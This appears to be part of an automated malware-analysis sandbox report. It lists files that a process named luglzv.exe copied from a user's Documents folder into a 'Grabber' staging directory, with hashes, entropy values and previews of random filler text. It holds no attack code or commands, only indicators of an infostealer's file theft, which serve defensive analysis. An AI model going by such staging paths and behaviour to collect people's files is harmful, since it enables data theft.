                                                                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                  Malicious:false
                                                                  Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\HTAGVDFUIE.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.692693183518806
                                                                  Encrypted:false
                                                                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                  MD5:78F042E25B7FAF970F75DFAA81955268
                                                                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                  Malicious:false
                                                                  Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS\KATAXZVCPS.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS\LTKMYBSEYZ.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.687722658485212
                                                                  Encrypted:false
                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                  Malicious:false
                                                                  Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS\RAYHIWGKDI.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.69782189124949
                                                                  Encrypted:false
                                                                  SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                  MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                  SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                  SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                  SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                  Malicious:false
                                                                  Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS\YPSIACHYXW.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS\ZBEDCJPBEY.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.6994061563025005
                                                                  Encrypted:false
                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                  Malicious:false
                                                                  Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\LTKMYBSEYZ.xlsx

                                                                  Download File
